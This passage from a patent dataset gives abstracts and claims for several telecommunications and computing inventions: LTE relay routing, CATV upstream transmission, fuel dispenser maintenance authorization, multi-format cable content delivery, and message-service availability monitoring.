receive a routing-information update request message transmitted by a second terminal device, which performs communication with a first terminal device through a core network, from the first terminal device, the routing-information update request message including at least identification information indicating that switching of a communication is required; select a third terminal device having a relay function, based on the identification information; and transmit a routing update instruction message which is a response to the routing-information update request message, and includes information of the third terminal device, to the first terminal device, and perform an instruction of performing a direct communication with the third terminal device by using LTE, so as to communicate with the first terminal device. 2. The server device according to claim 1, further adapted to:
transmit the routing update instruction message to the second terminal device, and perform an instruction of communicating with the second terminal device which performs the direct communication with the third terminal device by using LTE. 3. A server device adapted to:
lead switching between a first communication in which a communication with a first terminal device is performed through a core network of a second terminal device, and a second communication in which the second terminal device performs a direct communication with a third terminal device so as to communicate with the first terminal device; select the third terminal device having a relay function; and transmit a routing update instruction message including information of the third terminal device, to the second terminal device, and perform an instruction of switching to the second communication. 4. The server device according to claim 3, further adapted to:
transmit the routing update instruction message to the first terminal device, and perform an instruction of communicating with the second terminal device which performs a direct communication with the third terminal by using LTE. 5. A first terminal device which performs a communication with a second terminal device through a core network, the device adapted to:
transmit a routing-information update request message including at least identification information, to a server device by detecting a trigger of switching of a path, the identification information indicating that switching of a communication is required; receive a routing update instruction message including information of a third terminal device which has been selected by the server device and has a relay function, from the server device; and perform a direct communication with the third terminal device in accordance with the routing update instruction message by using LTE, so as to communicate with the second terminal device. | 2,400 |
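The server-side sequence in claim 1 of the record above (receive a routing-information update request, select a third terminal device having a relay function, answer with a routing update instruction) can be sketched as below. The message fields and the first-available-candidate selection policy are hypothetical; the patent does not constrain how the relay is chosen.

```python
def handle_routing_update_request(request, candidates):
    """Sketch of the server device's handling of a routing-information
    update request (claim 1). Returns a routing update instruction dict,
    or None if switching is not required or no relay is available."""
    # The request must carry identification information indicating that
    # switching of the communication is required.
    if not request.get("switch_required"):
        return None
    # Select a third terminal device having a relay function.
    relay = next((t for t in candidates if t.get("relay_capable")), None)
    if relay is None:
        return None
    # The response includes information of the selected third terminal
    # device, instructing direct communication with it by using LTE.
    return {"type": "routing_update_instruction",
            "relay_id": relay["id"],
            "bearer": "LTE-direct"}

instr = handle_routing_update_request(
    {"switch_required": True},
    [{"id": "UE-A", "relay_capable": False},
     {"id": "UE-B", "relay_capable": True}],
)
print(instr["relay_id"])  # UE-B
```

Per claims 2 and 4, the same instruction would also be transmitted to the peer terminal so that both endpoints switch from the core-network path to the relayed direct path.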
9,111 | 9,111 | 15,486,422 | 2,426 | Methods and systems capable of improving the transmission of data along an upstream path of a Hybrid Fiber-Coaxial Cable Network, from a transmitter in a node to a receiver in a Cable Modem Termination System. | 1. A method for sending a signal on an upstream path in a CATV network, the method comprising:
receiving an input electrical signal comprising upstream data from at least one cable modem of a CATV consumer, the input signal associated with a continuous spectrum within which all the upstream data occupies; sampling and digitizing only a selective portion of the continuous spectrum of the input electrical signal at the full Nyquist rate; converting the digitized signal to an optical signal; and sending the optical signal to a CMTS in a head end of the CATV network. 2. The method of claim 1 where the signal on an upstream path is sent at a throughput exceeding 1 Gbps. 3. The method of claim 1 where the signal on an upstream path is sent at 1024 QAM. 4. The method of claim 1 where portions of the continuous spectrum representing a guardband are not sampled and digitized. 5. The method of claim 1 where the input electrical signal is split into a first portion comprising a lower part of the continuous spectrum and a second portion comprising an upper portion of the continuous spectrum. 6. The method of claim 5 where each of the first and second portions are approximately 96 MHz in width. 7. The method of claim 5 where each of the first and second portions are approximately 85 MHz in width. 8. The method of claim 5 where the upper portion is bandpass filtered. 9. The method of claim 5 where the lower portion is not bandpass sampled and the upper portion is bandpass sampled. 10. The method of claim 5 including amplifying both the upper portion and the lower portion. | Methods and systems capable of improving the transmission of data along an upstream path of a Hybrid Fiber-Coaxial Cable Network, from a transmitter in a node to a receiver in a Cable Modem Termination System.1. A method for sending a signal on an upstream path in a CATV network, the method comprising:
receiving an input electrical signal comprising upstream data from at least one cable modem of a CATV consumer, the input signal associated with a continuous spectrum within which all the upstream data occupies; sampling and digitizing only a selective portion of the continuous spectrum of the input electrical signal at the full Nyquist rate; converting the digitized signal to an optical signal; and sending the optical signal to a CMTS in a head end of the CATV network. 2. The method of claim 1 where the signal on an upstream path is sent at a throughput exceeding 1 Gbps. 3. The method of claim 1 where the signal on an upstream path is sent at 1024 QAM. 4. The method of claim 1 where portions of the continuous spectrum representing a guardband are not sampled and digitized. 5. The method of claim 1 where the input electrical signal is split into a first portion comprising a lower part of the continuous spectrum and a second portion comprising an upper portion of the continuous spectrum. 6. The method of claim 5 where each of the first and second portions are approximately 96 MHz in width. 7. The method of claim 5 where each of the first and second portions are approximately 85 MHz in width. 8. The method of claim 5 where the upper portion is bandpass filtered. 9. The method of claim 5 where the lower portion is not bandpass sampled and the upper portion is bandpass sampled. 10. The method of claim 5 including amplifying both the upper portion and the lower portion. | 2,400 |
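Claim 9 above distinguishes the lower spectrum portion, which is not bandpass sampled, from the upper portion, which is. The rate savings behind that split can be illustrated with the standard uniform bandpass-sampling condition 2·fH/n ≤ fs ≤ 2·fL/(n−1); the 96-192 MHz band below is an example chosen to match the ~96 MHz portion width of claim 6, not a band taken from the patent.

```python
def bandpass_sampling_rates(f_low_hz, f_high_hz):
    """Valid uniform sampling-rate windows (n, fs_min, fs_max) for a band
    confined to [f_low_hz, f_high_hz], using the standard bandpass-sampling
    condition 2*f_high/n <= fs <= 2*f_low/(n - 1)."""
    bandwidth = f_high_hz - f_low_hz
    n_max = int(f_high_hz // bandwidth)  # largest usable integer "fold" count
    windows = []
    for n in range(1, n_max + 1):
        fs_min = 2.0 * f_high_hz / n
        fs_max = 2.0 * f_low_hz / (n - 1) if n > 1 else float("inf")
        if fs_min <= fs_max:
            windows.append((n, fs_min, fs_max))
    return windows

# A hypothetical 96 MHz-wide upper portion occupying 96-192 MHz:
for n, lo, hi in bandpass_sampling_rates(96e6, 192e6):
    print(n, lo / 1e6, hi / 1e6)
# n=1 is ordinary lowpass/Nyquist sampling (fs >= 384 MHz); n=2 is the
# bandpass option: 192 MHz captures the same band at half the rate.
```

This is why only the upper portion is bandpass sampled in claim 9: the lower portion starts near DC, so no fold count n > 1 is available and it must be sampled at the full Nyquist rate.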
9,112 | 9,112 | 15,801,947 | 2,434 | Systems and methods are provided for controlling maintenance of a fuel dispenser. In one exemplary embodiment, a system is provided having a fuel dispenser that includes an electronics module having a data processor, a remote enterprise server in communication with the electronics module, and a remote code processor in communication with the remote enterprise server. The data processor is configured to determine an authorization password based on data characterizing the fuel dispenser, to receive a remote password that is generated by the remote code processor based on the fuel dispenser data, to determine that the remote password matches the authorization password, and to cause the fuel dispenser to enter a maintenance mode. | 1. A system for controlling maintenance of a fuel dispenser, comprising:
a fuel dispenser comprising a housing having fuel dispensing components disposed therein and an electronics module disposed at least partially therein, the electronics module including a data processor configured to determine an authorization password based on data characterizing the fuel dispenser, to receive a remote password, to determine that the remote password matches the authorization password, and to cause the fuel dispenser to enter a maintenance mode; a remote enterprise server in communication with the electronics module, the remote enterprise server being configured to prompt the electronics module for the fuel dispensing data and to receive the fuel dispensing data, and to provide the remote password to the electronics module of the fuel dispenser; and a remote code processor in communication with the enterprise server, the remote code processor being configured to receive the fuel dispensing data from the enterprise server, to determine the remote password based on the received data, and to provide the remote password to the enterprise server. 2. The system of claim 1, wherein the fuel dispenser data comprises a challenge code and identity information of a central processing unit (CPU) of the electronics module. 3. The system of claim 1, wherein the remote enterprise server receives a command from an external source to request that the electronics module provide the fuel dispenser data. 4. The system of claim 3, wherein the electronics module provides different fuel dispenser data for each request received. 5. The system of claim 1, wherein the electronics module is adapted to prevent the fuel dispenser from entering maintenance mode prior to the data processor determining that the remote password matches the authorization password. 6. The system of claim 1, wherein the electronics module is adapted to receive a request and to cause the fuel dispenser to exit the maintenance mode. 7. 
The system of claim 1, wherein the enterprise server is configured to prompt the fuel dispenser for the fuel dispensing data at the expiration of a predetermined time period. 8. The system of claim 1, wherein the remote enterprise server is configured to transmit instructions to the electronics module to cause the electronics module to perform at least one maintenance operation on the fuel dispenser during the maintenance mode. 9. A processing system, comprising:
a data processing unit configured to be at least partially housed in a fuel dispenser and configured to generate and transmit data characterizing the fuel dispenser and to determine an authorization password based on the fuel dispenser data; a remote enterprise server configured to receive a command to prompt the data processing unit to provide the fuel dispenser data and configured to transmit a request to the data processing unit for the fuel dispenser data and to receive the fuel dispenser data; and a remote code processor configured to receive the fuel dispenser data from the enterprise server, calculate a remote password based on the received fuel dispenser data, and provide the remote password to the enterprise server; wherein the enterprise server is configured to receive the remote password and provide the remote password to the data processing unit; and wherein the data processing unit is configured to determine whether the remote password matches the authorization password. 10. The system of claim 9, wherein the data processing unit is configured to cause the fuel dispenser to enter a maintenance mode if the remote password matches the authorization password. 11. The system of claim 9, wherein, when the data processing unit determines that the remote password matches the authorization password, the data processing unit is configured to cause the fuel dispenser to enter a maintenance mode. 12. The system of claim 9, wherein the fuel dispenser data comprises a challenge code and identity information of a central processing unit (CPU) of the data processing unit. 13. The system of claim 9, wherein the data processing unit is configured to provide different fuel dispenser data for each request received. 14. The system of claim 9, wherein the data processing unit is configured to prevent a fuel dispenser from entering a maintenance mode prior to the data processor determining that the remote password matches the authorization password. 15. 
The system of claim 9, wherein the data processing unit is configured to receive a request and to cause a fuel dispenser to exit the maintenance mode. 16. The system of claim 9, wherein the remote enterprise server is configured to transmit instructions to the data processing unit to cause the data processing unit to perform at least one maintenance operation on a fuel dispenser during the maintenance mode. 17. A method for prompting a maintenance mode of a fuel dispenser, the method comprising:
calculating, by an electronics module comprising a data processor and that is at least partially housed in a fuel dispenser, an authorization password based on data characterizing the fuel dispenser; transmitting, by the electronics module, the fuel dispenser data to an enterprise server that is in communication with the electronics module; receiving and transmitting, by the enterprise server, the fuel dispenser data to a code processor that is in communication with the enterprise server; generating and transmitting, by the code processor, a remote password based on the received fuel dispenser data to the enterprise server; receiving and transmitting, by the enterprise server, the remote password to the electronics module; determining, by the data processor, that the remote password matches the authorization password; and causing the fuel dispenser to enter the maintenance mode. 18. The method of claim 17, further comprising generating, by the electronics module, the fuel dispensing data that includes a challenge code and identity information of a central processing unit (CPU) board of the electronics module. 19. The method of claim 17, further comprising receiving, by the electronics module, data comprising a request from the enterprise server to provide the fuel dispenser data. 20. The method of claim 17, further comprising prompting, by the enterprise server, the fuel dispenser for the fuel dispensing data at the expiration of a predetermined time period. 21. The method of claim 17, further comprising performing one or more maintenance operations on the fuel dispenser during the maintenance mode. | Systems and methods are provided for controlling maintenance of a fuel dispenser. In one exemplary embodiment, a system is provided having a fuel dispenser that includes an electronics module having a data processor, a remote enterprise server in communication with the electronics module, and a remote code processor in communication with the remote enterprise server. 
The data processor is configured to determine an authorization password based on data characterizing the fuel dispenser, to receive a remote password that is generated by the remote code processor based on the fuel dispenser data, to determine that the remote password matches the authorization password, and to cause the fuel dispenser to enter a maintenance mode.1. A system for controlling maintenance of a fuel dispenser, comprising:
a fuel dispenser comprising a housing having fuel dispensing components disposed therein and an electronics module disposed at least partially therein, the electronics module including a data processor configured to determine an authorization password based on data characterizing the fuel dispenser, to receive a remote password, to determine that the remote password matches the authorization password, and to cause the fuel dispenser to enter a maintenance mode; a remote enterprise server in communication with the electronics module, the remote enterprise server being configured to prompt the electronics module for the fuel dispensing data and to receive the fuel dispensing data, and to provide the remote password to the electronics module of the fuel dispenser; and a remote code processor in communication with the enterprise server, the remote code processor being configured to receive the fuel dispensing data from the enterprise server, to determine the remote password based on the received data, and to provide the remote password to the enterprise server. 2. The system of claim 1, wherein the fuel dispenser data comprises a challenge code and identity information of a central processing unit (CPU) of the electronics module. 3. The system of claim 1, wherein the remote enterprise server receives a command from an external source to request that the electronics module provide the fuel dispenser data. 4. The system of claim 3, wherein the electronics module provides different fuel dispenser data for each request received. 5. The system of claim 1, wherein the electronics module is adapted to prevent the fuel dispenser from entering maintenance mode prior to the data processor determining that the remote password matches the authorization password. 6. The system of claim 1, wherein the electronics module is adapted to receive a request and to cause the fuel dispenser to exit the maintenance mode. 7. 
| 2,400 |
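The fuel-dispenser claims above describe a challenge-response flow: the dispenser's data processor derives an authorization password from freshly generated dispenser data, a remote code processor derives a remote password from the same data, and the dispenser enters maintenance mode only on a match. The claims do not specify the derivation algorithm, so the sketch below assumes an HMAC over a pre-shared key; the key, the CPU-board identifier, and all names are hypothetical.

```python
import hmac
import hashlib
import secrets

# Assumption: dispenser and code processor share a provisioned secret.
SHARED_KEY = b"factory-provisioned-key"

def derive_password(dispenser_data: bytes, key: bytes = SHARED_KEY) -> str:
    # Both sides derive a password from the same dispenser data.
    return hmac.new(key, dispenser_data, hashlib.sha256).hexdigest()

class Dispenser:
    def __init__(self) -> None:
        self.maintenance_mode = False
        self._auth_password = None

    def generate_dispenser_data(self) -> bytes:
        # Fresh challenge per request (claim 13) plus CPU identity
        # information (claim 12); the board id here is illustrative.
        data = secrets.token_bytes(16) + b"CPU-BOARD-ID-0001"
        self._auth_password = derive_password(data)
        return data

    def submit_remote_password(self, remote_password: str) -> bool:
        # Maintenance mode is entered only on a match (claims 10-11, 14).
        if self._auth_password and hmac.compare_digest(
            remote_password, self._auth_password
        ):
            self.maintenance_mode = True
        return self.maintenance_mode

# Enterprise server relays data; code processor computes the remote password.
dispenser = Dispenser()
data = dispenser.generate_dispenser_data()        # dispenser -> enterprise server
remote_password = derive_password(data)           # enterprise server -> code processor
dispenser.submit_remote_password(remote_password) # enterprise server -> dispenser
```

Note that the enterprise server in the claims never computes a password itself; it only forwards the dispenser data outward and the remote password back.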
9,113 | 9,113 | 15,417,783 | 2,426 | A content delivery resource in a cable network receives a request for specified content. The content delivery resource retrieves profile information assigned to the subscriber domain. The profile information indicates multiple different playback formats assigned to the subscriber domain. To service the request, the content delivery resource utilizes the profile information associated with the subscriber domain to select versions of the specified content encoded in accordance with the multiple different playback formats. The content delivery resource then initiates transmission of the versions of the specified content in the multiple different playback formats to the subscriber domain for playback on multiple types of playback devices. | 1. A method comprising:
via computer processor hardware, executing operations of:
receiving a request for content, the request originated from a first playback device operated in a subscriber domain;
identifying multiple different playback formats associated with multiple devices operated in the subscriber domain, the multiple devices including the first playback device; and
to satisfy the request, transmitting versions of the content encoded in accordance with the multiple different playback formats to the subscriber domain. 2. The method as in claim 1, wherein identifying the multiple different playback formats includes:
identifying a first playback format assigned to the first playback device; and identifying a second playback format assigned to a second playback device of the multiple playback devices operated in the subscriber domain. 3. The method as in claim 2 further comprising:
to satisfy the request for content:
i) transmitting a first version of the specified content encoded in accordance with the first playback format over a first channel of a shared communication link to the first playback device in the subscriber domain; and
ii) transmitting a second version of the specified content encoded in accordance with the second playback format over a second channel of the shared communication link to the second playback device in the subscriber domain. 4. The method as in claim 2 further comprising:
to satisfy the request for content:
i) transmitting a first version of the specified content encoded in accordance with the first playback format to a repository in the subscriber domain; and
ii) transmitting a second version of the specified content encoded in accordance with the second playback format to the repository, the repository accessible by the first playback device and the second playback device. 5. The method as in claim 1, wherein identifying the multiple different playback formats includes:
mapping the first playback device to a first playback format; identifying a second playback format assigned to a second playback device operated in the subscriber domain. 6. The method as in claim 1 further comprising:
providing a notification to a user of the first playback device, the notification querying the user whether to transmit the requested content in a format supported by a second playback device in the subscriber domain. 7. The method as in claim 1, wherein the multiple different playback formats includes a first playback format and a second playback format, the method further comprising:
responsive to the request, streaming the requested content in the first encoding format in accordance with a first playback bit rate and streaming the requested content in the second encoding format in accordance with a second playback bit rate, the second playback bit rate different than the first playback bit rate. 8. The method as in claim 1, wherein transmitting the versions of the requested content includes:
controlling delivery of communications to multiple subscriber domains over a shared communication link including DOCSIS (Data Over Cable Service Interface Specification) channels and non-DOCSIS channels, the shared communication link conveying a first version of the requested content to the subscriber domain over a DOCSIS channel, the shared communication link conveying a second version of the requested content to the subscriber domain over a non-DOCSIS channel. 9. The method as in claim 1, wherein transmitting the versions of the requested content includes:
controlling channels in a shared communication link to multiple subscriber domains including the subscriber domain in which the first playback device is operated, the channels in the shared communication link including a first channel and a second channel, the method further comprising: to satisfy the request: i) transmitting a first encoded version of the requested content to the subscriber domain over the first channel, and ii) transmitting a second encoded version of the requested content to the subscriber domain over the second channel. 10. The method as in claim 3, wherein the subscriber domain is a first subscriber domain of the multiple subscriber domains;
wherein the first channel supports a predetermined bandwidth; and wherein the second channel supports a varying amount of bandwidth. 11. The method as in claim 1 further comprising:
streaming a first version of the content over a broadcast channel of a shared cable network to a repository in the subscriber domain, the first version of the content encoded for playback by a first playback device in the subscriber domain;
providing notification to a second playback device in the subscriber domain that the content has been requested for retrieval;
detecting input provided from the second playback device to stream a second version of the specified content directly to the second playback device; and
initiating transmission of the second version of the specified content over a portion of bandwidth of the shared cable network dedicated to transmission of IP (Internet Protocol) data traffic. 12. The method as in claim 11 further comprising:
to satisfy the request, streaming a first version of the content and a second version of the content over a shared communication link to a repository in the subscriber domain, the first version and second version of content transmitted over bandwidth of the shared communication link supporting QAM modulation, the first version of the content encoded for playback by a first playback device in the subscriber domain, the second version of the content encoded for playback by a second playback device in the subscriber domain. 13. A computer system comprising:
computer processor hardware; and a hardware storage resource coupled to the computer processor hardware, the hardware storage resource storing instructions that, when executed by the computer processor hardware, cause the computer processor hardware to:
receive a request for content, the request originated from a first playback device operated in a subscriber domain;
identify multiple different playback formats associated with multiple devices operated in the subscriber domain, the multiple devices including the first playback device; and
to satisfy the request, transmit versions of the specified content encoded in accordance with the multiple different playback formats to the subscriber domain. 14. The computer system as in claim 13, wherein the instructions executed by the computer processor hardware cause the computer processor hardware to:
identify a first playback format assigned to the first playback device; and identify a second playback format assigned to a second playback device of the multiple playback devices operated in the subscriber domain. 15. The computer system as in claim 14, wherein the instructions executed by the computer processor hardware cause the computer processor hardware to:
to satisfy the request for content:
i) transmit a first version of the specified content encoded in accordance with the first playback format over a first channel of a shared communication link to the first playback device in the subscriber domain; and
ii) transmit a second version of the specified content encoded in accordance with the second playback format over a second channel of the shared communication link to the second playback device in the subscriber domain. 16. The computer system as in claim 13, wherein the instructions executed by the computer processor hardware cause the computer processor hardware to:
map the first playback device to a first playback format; identify a second playback format assigned to a second playback device operated in the subscriber domain. 17. The computer system as in claim 13, wherein the instructions executed by the computer processor hardware cause the computer processor hardware to:
provide a notification to a user of the first playback device, the notification querying the user whether to transmit the requested content in a format supported by a second playback device in the subscriber domain. 18. The computer system as in claim 13, wherein the multiple different playback formats includes a first playback format and a second playback format; and
wherein the instructions executed by the computer processor hardware cause the computer processor hardware to: responsive to the request, streaming the requested content in the first encoding format in accordance with a first playback bit rate and streaming the requested content in the second encoding format in accordance with a second playback bit rate, the second playback bit rate different than the first playback bit rate. 19. The computer system as in claim 13, wherein the instructions executed by the computer processor hardware cause the computer processor hardware to:
control delivery of communications to multiple subscriber domains over a shared communication link including DOCSIS (Data Over Cable Service Interface Specification) channels and non-DOCSIS channels, the shared communication link conveying a first version of the requested content to the subscriber domain over a DOCSIS channel, the shared communication link conveying a second version of the requested content to the subscriber domain over a non-DOCSIS channel. 20. The computer system as in claim 13, wherein the instructions executed by the computer processor hardware cause the computer processor hardware to:
control channels in a shared communication link to multiple subscriber domains including the subscriber domain in which the first playback device is operated, the channels in the shared communication link including a first channel and a second channel, the method further comprising: to satisfy the request: i) transmit a first encoded version of the requested content to the subscriber domain over the first channel, and ii) transmit a second encoded version of the requested content to the subscriber domain over the second channel. 21. Computer-readable storage hardware having instructions stored thereon, the instructions, when carried out by computer processor hardware, cause the computer processor hardware to:
receive a request for content, the request originated from a first playback device operated in a subscriber domain; identify multiple different playback formats of multiple devices operated in the subscriber domain, the multiple devices including the first playback device; and to satisfy the request, transmit versions of the specified content encoded in accordance with the multiple different playback formats to the subscriber domain. | 2,400 |
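The content-delivery claims above hinge on one lookup: the subscriber domain's profile maps its devices to playback formats, and one encoded version is selected per distinct format. A minimal sketch, assuming a hypothetical in-memory profile store (the device names, format labels, and store layout are illustrative, not from the patent):

```python
# Hypothetical profile store: subscriber domain -> {device: playback format}.
SUBSCRIBER_PROFILES = {
    "domain-42": {"set-top-box": "mpeg2-qam", "tablet": "h264-abr"},
}

def select_versions(domain_id: str, content_id: str) -> list:
    """Return one (content, format) version per distinct playback format
    in the domain, as in claim 1: the request from one device triggers
    delivery of versions for every device type in the domain."""
    formats = sorted(set(SUBSCRIBER_PROFILES[domain_id].values()))
    return [(content_id, fmt) for fmt in formats]

versions = select_versions("domain-42", "movie-001")
# Two distinct formats in the profile -> two versions transmitted,
# e.g. one over a QAM broadcast channel and one over a DOCSIS/IP channel.
```

Deduplicating on format rather than device matters: two tablets sharing a format should not cause the same version to be transmitted twice.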
9,114 | 9,114 | 15,656,334 | 2,449 | An enhanced availability environment for facilitating a message service provided by a plurality of service elements is disclosed herein. The enhanced availability environment comprises a monitoring element and an enhanced availability element. The monitoring element monitors a first service element of the plurality of service elements for a monitored characteristic, generates monitoring information corresponding to the monitored characteristic, and communicates the monitoring information to the enhanced availability element. The enhanced availability element determines an availability of the first service element for the message service based at least in part on the monitoring information and an availability characteristic of the first service element, and communicates the availability to initiate an availability action. | 1. One or more computer readable media having stored thereon program instructions for implementing an enhanced availability process in a message service provided by a plurality of service elements, wherein the program instructions, when executed by a computer system, direct the computer system to:
receive monitoring information corresponding to a monitored characteristic of a first service element of the plurality of service elements; determine an availability of the first service element for the message service based at least in part on the monitoring information and an availability characteristic of the first service element; and communicate the availability of the first service element to initiate an availability action. 2. The one or more computer readable media of claim 1 wherein to determine the availability of the first service element the program instructions, when executed by the computer system, direct the computer system to:
process the availability characteristic to determine whether the first service element is operative or inoperative;
in response to a determination that the first service element is operative, process the monitoring information to determine if the first service element is available or unavailable. 3. The one or more computer readable media of claim 2 wherein to communicate the availability of the first service element the program instructions, when executed by the computer system, direct the computer system to communicate to a second service element whether the first service element is available or unavailable. 4. The one or more computer readable media of claim 3 wherein the availability action comprises removal of the first service element from the message service when the first service element is unavailable. 5. The one or more computer readable media of claim 4 wherein the program instructions, when executed by the computer system, further direct the computer system to direct service communications to a failover service element of the plurality of service elements in place of the first service element. 6. The one or more computer readable media of claim 3 wherein the message service comprises an email service, and wherein the plurality of service elements comprises a plurality of messaging servers, wherein the first service element comprises one of the plurality of messaging servers and wherein the second service element comprises another one of the plurality of messaging servers. 7. The one or more computer readable media of claim 3 wherein the message service comprises an email service, and wherein the plurality of service elements comprises a plurality of entry servers and at least one network load balancer, wherein the first service element comprises one of the plurality of entry servers and wherein the second service element comprises the network load balancer. 8. 
The one or more computer readable media of claim 1 wherein to receive the monitoring information the program instructions, when executed by the computer system, direct the computer system to receive the monitoring information from a monitoring element. 9. An enhanced availability environment for facilitating a message service provided by a plurality of service elements, the enhanced availability environment comprising:
a monitoring element configured to monitor a first service element of the plurality of service elements for a monitored characteristic, generate monitoring information corresponding to the monitored characteristic, and communicate the monitoring information to an enhanced availability element; and the enhanced availability element configured to determine an availability of the first service element for the message service based at least in part on the monitoring information and an availability characteristic of the first service element, and communicate the availability to initiate an availability action. 10. The enhanced availability environment of claim 9 wherein to determine the availability of the first service element, the enhanced availability element is configured to process the availability characteristic to determine whether the first service element is operative or inoperative, and in response to a determination that the first service element is operative, process the monitoring information to determine if the first service element is available or unavailable. 11. The enhanced availability environment of claim 10 wherein to communicate the availability of the first service element, the enhanced availability element communicates to a second service element whether the first service element is available or unavailable. 12. The enhanced availability environment of claim 11 wherein the availability action comprises a removal of the first service element from the message service when the first service element is unavailable. 13. The enhanced availability environment of claim 9 wherein the availability action comprises a designation of a passive message database hosted by a failover service element as an active message database in place of a previously active message database hosted by the first service element. 14. 
A method of operating an enhanced availability element to facilitate a message service provided by a plurality of service elements, the method comprising:
receiving monitoring information corresponding to a monitored characteristic of a first service element of the plurality of service elements; determining an availability of the first service element for the message service based at least in part on the monitoring information and an availability characteristic of the first service element; and communicating the availability of the first service element to initiate an availability action. 15. The method of claim 14 wherein determining the availability of the first service element comprises:
processing the availability characteristic to determine whether the first service element is operative or inoperative; and
in response to determining that the first service element is operative, processing the monitoring information to determine if the first service element is available or unavailable. 16. The method of claim 15 wherein communicating the availability of the first service element comprises communicating to a second service element whether the first service element is available or unavailable. 17. The method of claim 16 wherein the availability action comprises removing the first service element from the message service when the first service element is unavailable, and wherein the method further comprises directing service communications to a failover service element of the plurality of service elements in place of the first service element. 18. The method of claim 16 wherein the message service comprises an email service, and wherein the plurality of service elements comprises a plurality of messaging servers, wherein the first service element comprises one of the plurality of messaging servers and wherein the second service element comprises another one of the plurality of messaging servers. 19. The method of claim 16 wherein the message service comprises an email service, and wherein the plurality of service elements comprises a plurality of entry servers and at least one network load balancer, wherein the first service element comprises one of the plurality of entry servers and wherein the second service element comprises the network load balancer. 20. The method of claim 14 wherein receiving the monitoring information comprises receiving the monitoring information from a monitoring element. | An enhanced availability environment for facilitating a message service provided by a plurality of service elements is disclosed herein. The enhanced availability environment comprises a monitoring element and an enhanced availability element. 
The monitoring element monitors a first service element of the plurality of service elements for a monitored characteristic, generates monitoring information corresponding to the monitored characteristic, and communicates the monitoring information to the enhanced availability element. The enhanced availability element determines an availability of the first service element for the message service based at least in part on the monitoring information and an availability characteristic of the first service element, and communicates the availability to initiate an availability action. 1. One or more computer readable media having stored thereon program instructions for implementing an enhanced availability process in a message service provided by a plurality of service elements, wherein the program instructions, when executed by a computer system, direct the computer system to:
receive monitoring information corresponding to a monitored characteristic of a first service element of the plurality of service elements; determine an availability of the first service element for the message service based at least in part on the monitoring information and an availability characteristic of the first service element; and communicate the availability of the first service element to initiate an availability action. 2. The one or more computer readable media of claim 1 wherein to determine the availability of the first service element the program instructions, when executed by the computer system, direct the computer system to:
process the availability characteristic to determine whether the first service element is operative or inoperative;
in response to a determination that the first service element is operative, process the monitoring information to determine if the first service element is available or unavailable. 3. The one or more computer readable media of claim 2 wherein to communicate the availability of the first service element the program instructions, when executed by the computer system, direct the computer system to communicate to a second service element whether the first service element is available or unavailable. 4. The one or more computer readable media of claim 3 wherein the availability action comprises removal of the first service element from the message service when the first service element is unavailable. 5. The one or more computer readable media of claim 4 wherein the program instructions, when executed by the computer system, further direct the computer system to direct service communications to a failover service element of the plurality of service elements in place of the first service element. 6. The one or more computer readable media of claim 3 wherein the message service comprises an email service, and wherein the plurality of service elements comprises a plurality of messaging servers, wherein the first service element comprises one of the plurality of messaging servers and wherein the second service element comprises another one of the plurality of messaging servers. 7. The one or more computer readable media of claim 3 wherein the message service comprises an email service, and wherein the plurality of service elements comprises a plurality of entry servers and at least one network load balancer, wherein the first service element comprises one of the plurality of entry servers and wherein the second service element comprises the network load balancer. 8. 
The one or more computer readable media of claim 1 wherein to receive the monitoring information the program instructions, when executed by the computer system, direct the computer system to receive the monitoring information from a monitoring element. 9. An enhanced availability environment for facilitating a message service provided by a plurality of service elements, the enhanced availability environment comprising:
a monitoring element configured to monitor a first service element of the plurality of service elements for a monitored characteristic, generate monitoring information corresponding to the monitored characteristic, and communicate the monitoring information to an enhanced availability element; and the enhanced availability element configured to determine an availability of the first service element for the message service based at least in part on the monitoring information and an availability characteristic of the first service element, and communicate the availability to initiate an availability action. 10. The enhanced availability environment of claim 9 wherein to determine the availability of the first service element, the enhanced availability element is configured to process the availability characteristic to determine whether the first service element is operative or inoperative, and in response to a determination that the first service element is operative, process the monitoring information to determine if the first service element is available or unavailable. 11. The enhanced availability environment of claim 10 wherein to communicate the availability of the first service element, the enhanced availability element communicates to a second service element whether the first service element is available or unavailable. 12. The enhanced availability environment of claim 11 wherein the availability action comprises a removal of the first service element from the message service when the first service element is unavailable. 13. The enhanced availability environment of claim 9 wherein the availability action comprises a designation of a passive message database hosted by a failover service element as an active message database in place of a previously active message database hosted by the first service element. 14. 
A method of operating an enhanced availability element to facilitate a message service provided by a plurality of service elements, the method comprising:
receiving monitoring information corresponding to a monitored characteristic of a first service element of the plurality of service elements; determining an availability of the first service element for the message service based at least in part on the monitoring information and an availability characteristic of the first service element; and communicating the availability of the first service element to initiate an availability action. 15. The method of claim 14 wherein determining the availability of the first service element comprises:
processing the availability characteristic to determine whether the first service element is operative or inoperative; and
in response to determining that the first service element is operative, processing the monitoring information to determine if the first service element is available or unavailable. 16. The method of claim 15 wherein communicating the availability of the first service element comprises communicating to a second service element whether the first service element is available or unavailable. 17. The method of claim 16 wherein the availability action comprises removing the first service element from the message service when the first service element is unavailable, and wherein the method further comprises directing service communications to a failover service element of the plurality of service elements in place of the first service element. 18. The method of claim 16 wherein the message service comprises an email service, and wherein the plurality of service elements comprises a plurality of messaging servers, wherein the first service element comprises one of the plurality of messaging servers and wherein the second service element comprises another one of the plurality of messaging servers. 19. The method of claim 16 wherein the message service comprises an email service, and wherein the plurality of service elements comprises a plurality of entry servers and at least one network load balancer, wherein the first service element comprises one of the plurality of entry servers and wherein the second service element comprises the network load balancer. 20. The method of claim 14 wherein receiving the monitoring information comprises receiving the monitoring information from a monitoring element. | 2,400 |
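The two-step availability determination recited in claims 2, 10 and 15 of the record above — first check the availability characteristic (operative versus inoperative), and only for an operative element consult the monitoring information — can be sketched as follows. This is a minimal illustrative sketch, not the patented implementation; the load threshold and all function and server names are invented assumptions for the example.

```python
# Step 1: an inoperative element is unavailable outright.
# Step 2: an operative element is judged from the monitored
# characteristic (here, assumed to be a load metric with a 0.9 cutoff).
def determine_availability(availability_characteristic, monitoring_info):
    if availability_characteristic != "operative":
        return "unavailable"
    return "available" if monitoring_info["load"] < 0.9 else "unavailable"

# Availability action (claims 4-5, 17): remove an unavailable element
# from the message service and direct communications to a failover element.
def route_service(availability, element, failover_element):
    return failover_element if availability == "unavailable" else element

status = determine_availability("operative", {"load": 0.95})
print(status, route_service(status, "mail-server-1", "mail-server-2"))
```

Note the asymmetry the claims require: monitoring information is only consulted after the operative check succeeds, so a stale load reading on an inoperative element can never mark it available.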
